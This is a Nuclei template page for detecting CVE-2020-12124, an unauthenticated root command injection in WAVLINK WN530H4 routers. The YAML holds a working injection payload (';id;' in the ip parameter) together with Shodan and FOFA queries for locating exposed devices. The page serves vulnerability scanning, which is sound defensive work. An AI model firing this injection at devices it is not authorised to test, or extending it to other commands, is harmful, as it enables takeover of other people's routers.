Skip to content
Nuclei Templates

WAVLINK WN530H4 live_api.cgi - Command Injection

ID: CVE-2020-12124

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2020,rce,wavlink

Description

Section titled “Description”

A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.

YAML Source

Section titled “YAML Source”
id: CVE-2020-12124


info:
  name: WAVLINK WN530H4 live_api.cgi - Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.
  reference:
    - https://github.com/db44k/CVE-2020-12124
    - https://cerne.xyz/bugs/CVE-2020-12124
    - https://www.wavlink.com/en_us/product/WL-WN530H4.html
    - https://github.com/Scorpion-Security-Labs/CVE-2020-12124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12124
    cwe-id: CWE-78
    epss-score: 0.94551
    epss-percentile: 0.99227
    cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavlink
    product: wn530h4_firmware
    shodan-query: http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2020,rce,wavlink
variables:
  str: "{{rand_base(3)}}"
  num: "{{rand_int(1, 10)}}"


http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"


      - type: word
        part: body
        words:
          - "WiFiBand"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cd078e2a2ee1590e173ab88f163d1e4dc74a7f3e212f382f194d5c2336a6cdeb022050aa4aa81e2f28739d5671bd4c698cab1a3932c9b587add939aaec8ab5643d15:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12124.yaml"

View on Github